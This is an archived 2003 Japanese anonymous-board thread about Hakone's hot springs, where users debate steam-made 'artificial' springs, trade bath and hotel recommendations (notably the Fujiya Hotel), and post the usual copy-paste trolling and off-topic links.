5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

箱根の温泉について語るスレ

1 :名無しさん@お腹いっぱい。:03/10/15 22:36 ID:MuNCUaaV
箱根の温泉についていろいろ語ってください。

姉妹スレ
箱根について語るスレ 3
http://travel.2ch.net/test/read.cgi/travel/1064851693



2 :名無しさん@お腹いっぱい。:03/10/15 23:07 ID:JQuYp+al
2だじょ


3 :名無しさん@お腹いっぱい。:03/10/15 23:22 ID:K5gNzRZN
偽温泉

4 :名無しさん@お腹いっぱい。:03/10/15 23:40 ID:JenSSoq7
ぬるい。露天なんかに入った日にゃ風邪をひく。

5 :名無しさん@お腹いっぱい。:03/10/16 02:09 ID:+QIlky2x
箱根スレから来ました。
温泉板新設おめでとうございます。

6 :名無しさん@お腹いっぱい。:03/10/16 06:28 ID:EJyR7Bfi
蒸気で温泉作ってるって本当ですか?

7 :名無しさん@お腹いっぱい。:03/10/16 15:37 ID:0GVN/50M
>6
硫黄泉はね。原料は大涌谷の蒸気。
主に仙石原・強羅へ供給。
私は温泉マニアじゃないから平気だし好きです。
他の温泉は作りモンじゃないよ。

8 :名無しさん@お腹いっぱい。:03/10/16 18:48 ID:ppSlCTZl
>>6
はい。>>7さんの言うとおり一部地域は大涌谷の
火山ガスで強制的に造成された「温泉」になっています。
それに天然に湧いている大涌谷温泉を混ぜて配っています。
それも、かなり歴史は古いそうです。
箱根湯本や宮ノ下などの無色透明な温泉は、天然温泉です。

9 :名無しさん@お腹いっぱい。:03/10/16 19:22 ID:b+U7SgAu
芦の湯最強!強酸性だな
ど近眼のもんで眼鏡持ち込んだら、つるが解けたぞ。。。

10 :名無しさん@お腹いっぱい。:03/10/16 23:29 ID:wofoAzuL
>>6>>3
箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w


11 :名無しさん@お腹いっぱい。:03/10/18 11:56 ID:avfkrpEb
>>10
秋田。報知。

12 :名無しさん@お腹いっぱい。:03/10/18 11:57 ID:ebxfs79v
箱根の温泉宿ってべらぼうに高いって
印象があるのですが安上がり情報は?

13 :名無しさん@お腹いっぱい。:03/10/18 12:03 ID:sbNexUZ4
>12
宿情報は国内旅行板で聞けよ。スレ違いだ!


14 : ◆yosiO2PT3E :03/10/18 13:54 ID:GZvyYCqu
>>10
塩原新湯温泉もむじなの湯をのぞくとほとんど蒸気造成だったり。

箱根の穴場は早雲山のてっぺんにある寺湯かな。
入浴料金安いし、お湯もいいし、見晴らしもいい!

15 :名無しさん@お腹いっぱい。:03/10/18 15:09 ID:UM2n/yiU
こないだ湯本の『天山』行ったけど、なかなかいいお湯でございました。
ご飯おいしかったし。
ちと駅から遠いのが難点ではありますが、送迎バスを使えばよしと。

16 :名無しさん@お腹いっぱい。:03/10/18 18:31 ID:HQqb1Fuy
大湧谷が人工温泉なら、小湧谷の温泉は本物かい?

17 :名無しさん@お腹いっぱい。:03/10/18 18:52 ID:vtVXUW6j
天山はいいんだけど、休日は芋洗いになるから衛生上の理由で半循環にしてるらしい。

天山行くなら、掛け流しをしている平日がお勧め。

18 :名無しさん@お腹いっぱい。:03/10/19 18:25 ID:xWXgNfoL
渋いところで木賀温泉とかどうだろう。

19 :名無しさん@お腹いっぱい。:03/10/20 09:30 ID:7L647WLV
木賀温泉は保養所だけです。一般人に開放している所も有る
みたいだけど、敷居が高いです。


20 :名無しさん@いい湯だな:03/10/23 23:36 ID:KajkFRee
22 :名無しさん@いい湯だな :03/10/23 23:18 ID:rYx9o+Sm

イメージ戦略成功度日本一は、箱根でしょ。
提灯評論家雇って大嘘宣伝したおかげで、イカサマ温泉の分際でお湯が良いことになっちゃってるよw


23 :名無しさん@いい湯だな :03/10/23 23:29 ID:g9vyS/Jk

箱根はリゾート地であって、温泉目当てに行く人はいないんじゃない?そのくらいみんな分かってるよ。軽井沢と熱海を足して2で割ったかんじでしょ。


24 :名無しさん@いい湯だな :03/10/23 23:33 ID:KajkFRee

箱根はリゾート地としても2流と思う。
まず殺風景。
そして珍走団が多すぎ。

21 :名無しさん@いい湯だな:03/10/23 23:52 ID:cSZkkupW
ID:KajkFRee

22 :名無しさん@いい湯だな:03/10/24 00:01 ID:3K5Uj5o8
>>6>>3
箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w

23 :名無しさん@いい湯だな:03/10/24 01:04 ID:WG38dNGX
>>19
そうかー。じゃあ奥湯本とかどうだろう。
つっても俺湯本と強羅しか入ったことないんだけど。

24 : ◆iBy3gpatgg :03/10/25 22:49 ID:9UKtl995
今日、早雲山の寺湯と姥子温泉秀明館に行ってきますた。
秀明館、寺湯ともに非常に印象深いでしたね。

秀明館は浴室内の崖からあまりお湯が湧出してなかったのが残念ですが、とても満喫できますた。
普段私がよく行く国1沿いの箱根の温泉とはまた違う、箱根のよさを味わうことができますた。

25 :名無しさん@いい湯だな:03/10/25 22:54 ID:PcPcUtiV

旭区にはズーラシアがあるが・・・

痛々しいニュースに心が痛む。マジでつらい。
お亡くなりになった方の冥福を心より祈ります。
http://www.gazo-box.com/movie/src/1064911836798.wmv


26 :名無しさん@いい湯だな:03/10/25 23:43 ID:IZ5M+Gvs
誰か富士屋ホテルに泊まった事ある人いない?レポきぼんぬ

27 :名無しさん@いい湯だな:03/10/25 23:48 ID:ptqEc76G
>>25
その人重症で済んだんじゃなかったっけ?
女の職員も、泣いてないで早く応援を呼べばいいのに。。。
しかし「痛いよ〜〜〜〜!!!」という絶叫が生々しすぎる。

28 :名無しさん@いい湯だな:03/10/26 19:58 ID:o/o5IYus
>>27
死んでいるよ。

ライオン十数頭に襲われ飼育員死亡
http://www.yomiuri.co.jp/hochi/news/apr/o20030423_30.htm


29 :名無しさん@いい湯だな:03/10/27 00:53 ID:sjdd2G4h
箱根七湯ってどこの事?七ヶ所とも教えてくだせえ

30 :名無しさん@いい湯だな:03/10/27 01:02 ID:5enOpX6n
湯本、塔之沢、堂ヶ島、宮ノ下、底倉、木賀、芦之湯

31 :名無しさん@いい湯だな:03/10/27 01:10 ID:sjdd2G4h
ありがd(・人・)

32 :名無しさん@いい湯だな:03/10/28 02:32 ID:KjxeJss/
>26

 泊まった事は無いけど、ランチを食った事はあるよ。
 結構良いと思います。
 1品1品ゆっくり食べる事ができるのが良いですね。味は昔っぽいのかな?
 雰囲気込みで考えるとお勧めできるかもしれません。
 というか、温泉スレじゃん。ここw

33 :名無しさん@いい湯だな:03/10/28 02:35 ID:KjxeJss/
 漏れのお勧めは、小湧園の1泊朝食5000円でとまれる宿泊施設です。
 これお勧めです。お一人様でも泊まれるのが良い。

34 :名無しさん@いい湯だな:03/10/28 13:33 ID:ljwtitnD
小湧谷温泉も大湧谷と同じく人工温泉でないでしょうね

35 :名無しさん@いい湯だな:03/10/28 14:58 ID:KjxeJss/
>34

 おたじゃないので、よくは知らないが、湯量はあると思うので、本物だと思う。
 ただ、おそらく、循環。
 でも、それはどうでもよいよ。
 1人で気兼ねなく、清潔なところに泊まれればよい。(やや狭いけど・・・)


36 :名無しさん@いい湯だな:03/10/28 18:52 ID:tlv50jk6
>>32
いや、温泉はどうなのかなと。

37 :名無しさん@いい湯だな:03/10/28 20:28 ID:3JvZGATp
 ジャクジーがあったり、コーヒーだのハーブだのと色々添加してる
温泉は、循環以外にあり得ない。
 かけ流しにしたら、入浴剤がいくらあっても足りないわ。

38 : ◆iBy3gpatgg :03/10/28 22:50 ID:r+1uFzUG
>>34
人工温泉は、仙石原、強羅などへ配湯されてますが、小湧谷には配湯されていませんよ。

↓湯しゅらんの箱根解説の中で、(造成)と書かれているところが人工泉です。

http://www.asahi-net.or.jp/~ue3t-cb/bbs/special/sience_of_hotspring/sience_of_hotspring_7-1-0.htm

39 :名無しさん@いい湯だな:03/10/28 23:34 ID:KjxeJss/
>36

 ごめんね。泊まった事は無いので・・・
 しかし、富士屋は温泉だけど、普通のホテルの浴槽でしょ?
 雰囲気とかどうなんでしょうね?
 漏れも誰かに感想を伺いたいです。

40 :名無しさん@いい湯だな:03/10/28 23:56 ID:tlv50jk6
>>39
なんかね冨士屋のHP見ると温泉プールとかサウナとかあるらしいんだよね。
俺は貧乏性だし神奈川県西部在住なので冨士屋ホテル泊まった事無いんだけども

41 : ◆iBy3gpatgg :03/10/29 06:31 ID:MMjmlkiM
自己レスですが、
>>38

×湯しゅらん
○温泉みしゅらん

普段仲間内で使ってる呼び名を間違って書いてしまってました。恥ずかしい・・・

42 :名無しさん@いい湯だな:03/10/29 07:24 ID:mZ/5PNma
>>34
箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w


43 :通りすがり:03/10/31 22:22 ID:yfOU/gfs

http://that.2ch.net/test/read.cgi/onsen/1066786613/l50


44 :名無しさん@いい湯だな:03/10/31 22:30 ID:yfOU/gfs
まじな話。
造成温泉、なんか問題ある?

自然じゃないからいやだ、ってのだったら、入浴するひとの勝手。
いやなら入らなければいいだけで、
いいかげんな循環温泉は危険だと他人に教えるのとは違う。

45 :名無しさん@いい湯だな:03/10/31 22:52 ID:6E3ZO/f3
>>44
特に問題無いと思うけど。
てか、相手にしたければこっちへ移動して。http://that.2ch.net/test/read.cgi/onsen/1067519592/


46 :名無しさん@いい湯だな:03/10/31 23:01 ID:6E3ZO/f3
誘導先だとスレ違いになっちゃうか。
ま、ここではマターリと箱根について語り合うってことで、
コピペはほっときましょう。

47 :名無しさん@いい湯だな:03/11/01 01:49 ID:7gvxXaxw
>>36
プール(デコっぽくてレトロでいい)も温泉だし、大浴場もあるよ。
部屋は普通のホテルの風呂(猫足のバスタブがある部屋もある)だが、
蛇口をひねれば、温泉。
だから、お湯的には問題ないが、ホテルなので、日本的温泉情緒はない。
クラシックホテルなんで、そういうのが好きなら、泊まってみるのもいい。
ただ、フォレストロッジ(新館)はやめたほうがいい。
普通のホテルと変わらないから。できれば、花御殿か西洋館がベター。
天井の高いレストランでの朝食はすごくいい。

48 :名無しさん@いい湯だな:03/11/01 03:41 ID:Tdh1lN2c
>天井の高いレストランでの朝食はすごくいい。
あのテレビで良く紹介されるレストランだよね。
あれはあこがれちゃうね。
ああいうところでゆっくりと飯食ってみたい。

49 :名無しさん@いい湯だな:03/11/01 07:27 ID:8Vkyv4bN
>47

 「総合的な雰囲気がよいので、いいかも。」みたいな評価でよいのでしょうか?

 漏れも、あこがれちゃいますね。あ〜、ランチだけじゃなくて一度泊ってみたいよ。

50 :名無しさん@いい湯だな:03/11/01 07:29 ID:8Vkyv4bN
>47

 もしかして、プールが温泉だから、1年中泳げる?

51 :名無しさん@いい湯だな:03/11/01 11:17 ID:laZ04ZAW
箱根が人工的に温泉を拵えているのは相当昔から知られている。理由は沢山の温泉リゾートの建設で
湯量が激減してしまったから。んで、普通の水を山中のとある場所から山に供給して湯量の確保をして
いる。単純には「地下水の枯渇」である。だが、山中に供給された膨大な水量は「それなりに」温泉とな
る場数を踏んで?汲み上げられるので、立派な温泉の湯として使えるし、確かちゃんとした認定も特別に
受けているはず。町として或いは県としての事業としてこの水利供給事業は行われているはずです。
でも勿論、芦ノ湖は静岡県のものだから(湖水の所有権ね)ちゃんとお金とかは払っているはずですよ。
別に問題はないと思っているけど。

52 :名無しさん@いい湯だな:03/11/01 12:44 ID:4g6jmmpq
>>50
泳げるね。一年中

53 :名無しさん@いい湯だな:03/11/01 13:45 ID:Ambx3s1a
>>50
泳げるよ。夏には庭にあるガーデンプールもオープンするけど、
水が冷たいし、上がるとさすがに避暑地だけあって涼しいんで、もう一度
水に入る気がしなくなる。なので、オレは夏でも室内プール専門(w
食堂はねえ、朝が一番いいよ。大きな窓から朝日が射し込んで、
ゆっくりとパンとコーヒー(バイキングじゃないのもいいよね)。
あの朝食が食べたくて泊まりに行ってた。


54 :名無しさん@いい湯だな:03/11/01 15:32 ID:To8W27Fk
>>53
同感。
時間の流れがゆっくりになる気分だよね。
ボケっとしてると数十年前にワープする気分。


55 :名無しさん@いい湯だな:03/11/01 15:36 ID:To8W27Fk
一応念の為に
宮ノ下富士屋は源泉をなんと13本も持っている。
これは国内第2位だったかな。

56 :名無しさん@いい湯だな:03/11/01 17:30 ID:8Vkyv4bN
>55

 サンクス。
 要するに、循環じゃないって事ね。
 これもポイント高いですね。
 機会があったら泊まってみたいです。

57 :名無しさん@いい湯だな:03/11/01 21:29 ID:hkfXsDie
富士や関係者もすげーな。よく恥ずかしくも無く(ry

58 :名無しさん@いい湯だな:03/11/01 22:08 ID:OmuXn3cr
転載しまつね。

16 :名無しさん@いい湯だな :03/10/31 22:29 ID:arCsBrog
>15
お前は全然解かってない。
残念ながら、真の名湯は掘りまくられたため既に没落している。
箱根が名湯と聞いたことないし古人も箱根を名湯と評価していない。
だが一応、昔は湯治場として意味があったかもしれない。

要は箱根に多くの人が訪れるようになり、少ない湧出量でそれをまかなうため水で薄めたり人工的に温泉を造成したりした昭和以降そして現在、箱根を名湯を持ち上げる評論家をどうとらえるか、だ。

59 :名無しさん@いい湯だな:03/11/02 06:13 ID:4KjnUrpf
宮城野温泉会館行ったら、地元民(60歳以上だったか)\100
地元以外、\600にはボッタクリとオモタ。しかも循環だった。

http://www.yumeguri.com/higaeri/kanagawa/miyagino.html

60 :名無しさん@いい湯だな:03/11/02 06:33 ID:Qat3Tx55
>>110
田舎ッペは箱根に く る な !

61 :名無しさん@いい湯だな:03/11/02 08:59 ID:aPKqOkhr
>>110って何処よ・・・・・

62 :名無しさん@いい湯だな:03/11/02 09:03 ID:yZSD+E/l
>>58
箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w

63 :名無しさん@いい湯だな:03/11/02 10:34 ID:tEZ5/V6a
仙石原のホテルに泊まるんですが、「引き湯」ってヤツですよねぇ。
それって地下水になにか硫黄なんか混ぜ物して温泉と銘打ってるんでしょうか?
循環と違ってかけ流しではあるんでしょうかねぇ。
アトピーがあるので心配で。


64 :名無しさん@いい湯だな:03/11/02 13:22 ID:aPKqOkhr
>>63
アトピーがあるなら温泉の総てを念の為止めたほうが良い。
賭け流しはどうかは旅館ごと違う。宿泊先言わな・・・
地下水になにか硫黄なんか混ぜ物して<要お勉強
つまりねメチャクチャ言ってるから意味わかんね。

65 :名無しさん@いい湯だな:03/11/02 15:26 ID:Bn5VQRBl
>>56
社会人の今では泊まるだけの金もあるんだが、
何か敷居が高く感じてしまうところもあってね。
俺の田舎じゃ一種ステイタスシンボルみたいな感じもあって、
どんな服装で行けば良いのかとか考えると、二の足踏んでしまう。

66 :名無しさん@いい湯だな:03/11/02 17:57 ID:aPKqOkhr
>>65
えっとね。煽りじゃないから念の為。
あそこは言ってみると分かると思いますが
何回も行く人や金持ちほど普段着ですよ。
初めて行く人は気合が入りすぎてオノボリさん丸出し。
(確か私もそうだったような気がする・・・)
むしろ生地の良いダンガリーにコットンパンツの方が格好良いよ。


67 :名無しさん@いい湯だな:03/11/02 18:22 ID:tevlUkPQ

宣伝丸出しの自作自演野郎がウザい。

63=64=65=66は、文体および文章のクセが全く同じ。 いいかげんに死ねよ。

68 :名無しさん@いい湯だな:03/11/02 18:56 ID:aPKqOkhr
チミはアホ?


69 :名無しさん@いい湯だな:03/11/02 18:59 ID:AqxERcHb
>>62
転載しまつね。

16 :名無しさん@いい湯だな :03/10/31 22:29 ID:arCsBrog
>15
お前は全然解かってない。
残念ながら、真の名湯は掘りまくられたため既に没落している。
箱根が名湯と聞いたことないし古人も箱根を名湯と評価していない。
だが一応、昔は湯治場として意味があったかもしれない。

要は箱根に多くの人が訪れるようになり、少ない湧出量でそれをまかなうため水で薄めたり人工的に温泉を造成したりした昭和以降そして現在、箱根を名湯を持ち上げる評論家をどうとらえるか、だ。

70 :名無しさん@いい湯だな:03/11/02 18:59 ID:Bn5VQRBl
>>66
だからさ、行った事無くて雰囲気わからんから、二の足踏んじゃうわけよ。
下手するとお上りさん丸出しになっちゃうわけだろ?

71 :名無しさん@いい湯だな:03/11/02 19:06 ID:IHmPWsz8
>>69
日本三大○○
http://www.sun-inet.or.jp/~s-chiemi/travel/sandai.html
http://csx.jp/~zawa/100_data/3dai_top.htm
http://soneta.hmc6.net/o-meitou.html

箱根温泉の名は、どこにも無い。これが古人の箱根に対する評価だ。

72 :名無しさん@いい湯だな:03/11/02 19:35 ID:O17bf9My
>>66
んー、煽りではないですが、
今時、コッパンにダンガリーって・・・・・・ちょっと信じられない。
何十年前に行かれたのでしょうか?

73 :名無しさん@いい湯だな:03/11/02 20:11 ID:xDQSzD/T
>>66
言ってて恥ずかしくないか、おまえ(失笑

74 :名無しさん@いい湯だな:03/11/02 21:45 ID:X9b/MbhG
箱根は外人さん(欧米人)よく見かけるな。

75 :お知らせ:03/11/02 23:12 ID:F85UUlhx
現在テレビ朝日系毎週火曜19:00〜19:54の時間には、
『旅の香り時の遊び』を放送しています。毎週様々な宿を有名人が訪れて、
旅の究極を教えてくれます。皆さん是非ご覧ください!!
詳細情報↓
http://www.tv-asahi.co.jp/tabitoki/


76 :名無しさん@いい湯だな:03/11/02 23:17 ID:XYeuL6Ys
>>74>>66
またおまえか。

ハイソかぶれの貧乏人には、似非ハイソの箱根が眩しいらしい(失笑

77 :名無しさん@いい湯だな:03/11/02 23:44 ID:Bn5VQRBl
>>74
宮ノ下の辺りとか多いね。

78 :名無しさん@いい湯だな:03/11/03 00:17 ID:p4+d36iq
66の言ってることはおおむね正しいよ。
コッパンにタンガリーの奴は近頃お目にかかれないが。
それにホントの金持ちは富士屋には泊まらないだろう。
別荘があるか、もっとお洒落で高い処へいくよ。
育ちがいい人はいるとは思うが。
リゾートホテルなんだから、レストランでの夕食時はジャケット着用が
望ましいけど、あとはジーンズでも半ズボンでもいいんだよ。
オレなんかバイクで乗り付けたりしちゃうし。
でも、雨に降られてドロドロびしょぬれになった時は、
さすがに入るのためらったが。


79 :74:03/11/03 00:18 ID:Ss8jixEx
>>76
なんで俺が66になるんだよw
ダンガリーとか知らねーっつーの。

行く途中の海老名SAとかも外人さん多いな。
俺はいつも東北道か関越道方面なんで、客層の違いが目に付くよ。

80 :74:03/11/03 00:24 ID:Ss8jixEx
芦之湯は中々いいな。

81 :名無しさん@いい湯だな:03/11/03 01:09 ID:gUj/0455
 やはり、みなさんにとっても冨士屋は憧れのホテルなのねw

82 :名無しさん@いい湯だな:03/11/03 01:12 ID:RTZ5pXZw
芦の湯はでかい桜の木が植わってるところがあって。
4月下旬の桜が咲いてる頃、ある晩えらい冷え込んで雪が降ったことがあった。
街灯でぼんやり見える桜の花の上に、大きな牡丹雪が次から次に降りかかって、
それはもう本当に美しい光景だった。

83 :名無しさん@いい湯だな:03/11/03 10:14 ID:I9Ah+EcC
転載しまつね。

16 :名無しさん@いい湯だな :03/10/31 22:29 ID:arCsBrog
>15
お前は全然解かってない。
残念ながら、真の名湯は掘りまくられたため既に没落している。
箱根が名湯と聞いたことないし古人も箱根を名湯と評価していない。
だが一応、昔は湯治場として意味があったかもしれない。

要は箱根に多くの人が訪れるようになり、少ない湧出量でそれをまかなうため水で薄めたり人工的に温泉を造成したりした昭和以降そして現在、箱根を名湯を持ち上げる評論家をどうとらえるか、だ。

84 :名無しさん@いい湯だな:03/11/03 14:14 ID:v9/aJfWK
>>81
マジレスだけど、確かに20年位前までは一目置かれてたと思う。
でも昼間のダイニング行ってごらん?
団体の観光バスで流れついたおばちゃん達のルートな訳だよ。
エージェントと組んであのツアーにGOサイン出した時点で、落ちぶれたと思うな。
歴史を感じる外観に憧れ、というなら自分もそう。
でも、一歩入った時点で・・・・引く。

85 :名無しさん@いい湯だな:03/11/03 15:32 ID:Fhk+z3EF
>>84
確かにその通り。
この前昼間久しぶりに昼食食べに言ったら引いた・・・。
あんなんじゃだめだよなー。がた落ちだよなー。
夜は静かになるけどステイタスは無くなったよなー。
国際興業も遂に歴史を金に変え始めた。
あんなんじゃシェラトンにでも売っぱらった方が良い。

86 :名無しさん@いい湯だな:03/11/03 23:41 ID:gUj/0455
>84

 漏れは、昼の2時位にランチを食べにいった事あるよ。
 その時は、84の言うようなツアー客がいなくて、漏れの他に3、4組ってところだったので、静かにゆっくりとしたランチを楽しめたよ。(あんなにマターリしたランチは、漏れにとっては極めて稀)
 だから、その時々という事もあるのでは?
 ただ、ステータスが無くなったっていうのは、当たっているかもしれないですね。
 それはそうだよ。大昔は、上流階級相手にしていたけど、戦後では、そんな商売のやり方は無理だし、だからこそ、漏れのような香具師もランチできるんだから。
 ステータスが無くなったのは確かでしょうが、そのお陰で、漏れのような香具師が泊まれるようになった訳だから、ある程度、許容してあげたいですね。
 ステータスが高くても、自分が泊まれなければ仕方が無いし・・・

>歴史を感じる外観(雰囲気)に憧れ

 という事でよいのでは。仮に、それが幻想・妄想であっても、自分自身が納得していればよい訳だし。



87 :名無しさん@いい湯だな:03/11/04 00:40 ID:LVTU3ytX
実はオレ、富士屋ホテルが国際興業の傘下に入ってすぐ行って、
スタッフの姉ちゃんに「こんにちは」っていわれてから、
行ってないんだよ。
古いかもしれないけど、お客に「こんにちは」はないと思う。
それが国際興業マニュアルなんだろうけど。
いまじゃファミレスでもどこでも使ってるけど、オレはいやだ。

88 :名無しさん@いい湯だな:03/11/04 01:07 ID:2LFabu8e
>>84
おばちゃんの団体は確かに嫌だね。
雰囲気壊さずマナー守ってくれればいいけど。
やっぱり、老舗でも不況になって団体客でもどんどん取らないと経営が難しいのかも。
湯本辺りでも随分潰れたところがあるって話だし。

89 :名無しさん@いい湯だな:03/11/04 04:03 ID:fDTLmNQA
>88

 禿同。
 老舗でも団体客をとらないと・・・というような経営方針もいい悪いは別にして1つの考え方ではあるよね。
 だから、ある程度は許容されて良いかと。

90 :名無しさん@いい湯だな:03/11/04 17:31 ID:aUrQ7VUC
そうだねぇ。
現実問題として、経営が成り立たなければしょうがないからね。


91 :名無しさん@いい湯だな:03/11/04 18:44 ID:t6GjwAAy
だけど、冨士屋ホテルが昔のようなステータスを失ったとすると、
高級ホテル・旅館行こうと思ったら箱根ではあとどこがあるのかな?
ミーハーで見聞きするばかりだから知らないんだよね。

92 :名無しさん@いい湯だな:03/11/04 20:17 ID:oOSbFHgT
豊月なんてどうだい?


93 :名無しさん@いい湯だな:03/11/04 21:10 ID:CEWWOEbX
>92
釣りかよ!高級で、と聞いてるんだけど(w

94 :名無しさん@いい湯だな:03/11/04 21:10 ID:t6GjwAAy
すまん全然知らなくて。豊月ってどこにあるの?

95 :名無しさん@いい湯だな:03/11/04 22:12 ID:slEEyahO
>94
自分の目で確かめるのが一番だよ。
本当に何も知らなそうなので(こんな言い方ごめんね)
ここは結構強力な旅館関係者が宣伝で貼りついているし、
行って騙された〜なんて、掲示板のカキコ恨むのも嫌でしょうし。

豊月が気になるなら、グーグルで検索すれば、宿泊日記や
体験談がいくらでも出てくるから、そっちの方が参考になると思う。


96 :名無しさん@いい湯だな:03/11/05 03:06 ID:QOUR/kQM
走行中にドア開く
箱根のケーブルカー

4日午前9時40分ごろ、神奈川県箱根町を走る箱根登山鉄道の公園上−中強羅駅間で、
走行中のケーブルカー(2両編成)のドアの1つが突然開き、自動停止した。乗客約80人にけがはなかった。
国土交通省航空・鉄道事故調査委員会は5日、原因究明のため鉄道事故調査官2人を現地に派遣する。
箱根登山鉄道によると、ケーブルカーはドアを締め切る応急処置をして、約4分遅れで終点まで運転したが、
その後の運行を打ち切り、バスで代行輸送した。事故原因が分かるまで代行輸送を続ける予定。





97 :名無しさん@いい湯だな:03/11/05 04:40 ID:wsTAgi1q
30日にもケーブルカー故障してた。
強羅に着く直前(本当に数メートル)でストップしてしまったみたい。
すぐ動いたけれど。

98 :名無しさん@いい湯だな:03/11/08 05:46 ID:zFmteCZD
明日から箱根にいってきまーす。一日目は富士屋ホテルで
二日目はホテルグリーンプラザです。楽しみ楽しみ♪

去年は桐谷箱根荘と箱根アカデミーにいってきまちた。
あと入浴だけでマウントビュー箱根も。

これからも毎年2、3件づついこうかな。

99 :名無しさん@いい湯だな:03/11/08 05:59 ID:py2y+QIC
>98

 帰ってきたら、れぽ、宜しくお願いします。

100 :名無しさん@いい湯だな:03/11/08 17:40 ID:KXY73B2r
自分、源泉のある宿である○坂屋に泊まったが、
温泉は、すごく良かったが、
脱衣所がホコリっぽかったのが、イマイチ。
掃除には手を抜いてほしくないなあ。

101 :名無しさん@いい湯だな:03/11/08 20:23 ID:v0HPNHxw
大日本帝國万歳!!
http://members.tripod.co.jp/almond_choco11/kaiten.swf
http://noigel.hp.infoseek.co.jp/swf/kakutatakaeri.swf


102 :名無しさん@いい湯だな:03/11/09 20:35 ID:RwC5McEf
>>98
私も月末にグリーンプラザに行くので
ぜひぜひレポお願いします!
今頃お湯に浸かってるのかな?

103 :名無しさん@いい湯だな:03/11/10 12:52 ID:MRd3Ii51
昨日、ユネッサンにいった。
プールあるじゃん?そこでクソガキ2名(推定:消防高学年)が救命用浮き具使って遊んでた。
監視員が注意して、浮き具を奪い返そうとしたが、ガキは逆キレしたのか、必死に抵抗する。
力づくで奪い返したが、そしたらクソガキたちがさめざめと泣きやがった。
そこへドキュソ母とおぼしき人が登場し、「なにうちの子泣かしてるの!」みたいな感じのことを言ってた。
監視員「これは遊び道具じゃないので…」
母「そんなのこの子にわかるわけないでしょう!使われたくなかったら遊び道具置いときなさいよ」
監視員「浮き輪とかビーチボールでしたら売店に売ってますし、レンタルもありますので…」
母「あっそう!わざわざ遠く浜松から来たのに、せっかくの箱根旅行が台無しじゃないの!何ヶ月も前から予約して、この子たちも楽しみにしたたのに…」
そこへ、お偉方登場
お偉方「(監視員の頭を下げさせて)今回は申し訳ございません。ここですと他のお客様もいらっしゃいますので、お話でしたら私がお聞きしますので…」と、他へ行ってしまった。
その後はどうなったかわからないが、おそらくお偉方はあとで監視員に対して、
「キミのやったことは間違ってない。まぁ、お客様にはいろんなのがいるさ。間違ってなくても頭を下げなきゃならないときは、ある。それがサービス業だ。今回のことは気になさるな(肩をポンと叩く)」
とでも言ったと思われる。
ついでにこのクソガキは飛び込みもして注意されてもいたなぁ。
ついでに、ヤソキーっぽい人(20代?)も悪ふざけで仲間をプールに落として注意されてた。コイツも逆切れしてたが、それほどでもなかった。


104 :名無しさん@いい湯だな:03/11/10 13:02 ID:gLAKZ36y
>>103
ドキュソは漬物石をくくりつけて芦ノ湖に沈めたれw

105 :名無しさん@いい湯だな:03/11/10 13:06 ID:MRd3Ii51
>>104
ナイス突っ込み!
浜松はDQN多いね。
まぁ、浜名湖かんざんじ温泉にでも行ってなさいってこった。

106 :名無しさん@いい湯だな:03/11/11 08:03 ID:EWpG0LCV
俺だったら熱川ワニ園のワニのエサにする

107 :名無しさん@いい湯だな:03/11/11 20:38 ID:1UtDXcYX
>62
こういう仕組みだったのか。
既に今週末に箱根の温泉予約してしまったけど、蒸気温泉の効果を確かめて
くるよ。

108 :7:03/11/14 15:27 ID:PZFc9o9Z
>>103
ホント、DQNなガキだな。
親の顔見てみたいよ。

109 :名無しさん@いい湯だな:03/11/15 00:33 ID:1/ytO7RA
かつて箱根は地獄だった。

110 :名無しさん@いい湯だな:03/11/15 02:17 ID:xsljT8aq
>>61
こちとら江戸っ子でぃ!

111 :名無しさん@いい湯だな:03/11/15 14:31 ID:gBr8WTZJ
>>58
箱根は結構人工温泉が多いからね〜
ここをご覧あれ
http://www.hakoneonsen.com/
‥‥タンクに溜まった水に上から高温の蒸気(火山性ガス)を吹き付けることによって、
温泉が出来上がります。詳しい構造は、”こちら”をご覧下さい。
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
なんか感心してしまったヨ。

「イカサマ温泉=箱根」が証明されちゃったね。w

112 :名無しさん@いい湯だな:03/11/15 23:41 ID:Z7cZDhCs
強羅の花壇は荒れてる。
ハードは銭で何とでもなるが、仲居の程度が最悪!
是非、見に行って!
組合でもあるんか?

113 :名無しさん@いい湯だな:03/11/16 15:18 ID:hhEIuicz
(誰も言わないから言うけど)
ここは箱根温泉専用スレにしてくれよぅ。
「箱根について語るスレ」と両方見るのが面倒だからさ。
旅館の話はそっちに書いてくれよぅ。

114 :名無しさん@いい湯だな:03/11/18 08:12 ID:DRp+rAvk
こないだ天山行ってきますた。
(・∀・)イイ!! 湯ですた。
紅葉の時期にまた行きたいなぁ。

115 :名無しさん@いい湯だな:03/11/18 13:17 ID:BQ7PsZCO
天山っていまだに混んでるの?
前に何度か行こうとしたんだけど、凄く混んでてあきらめた。
週末はやっぱりだめですかね。

116 :名無しさん@いい湯だな:03/11/18 16:02 ID:q6RyrCYG
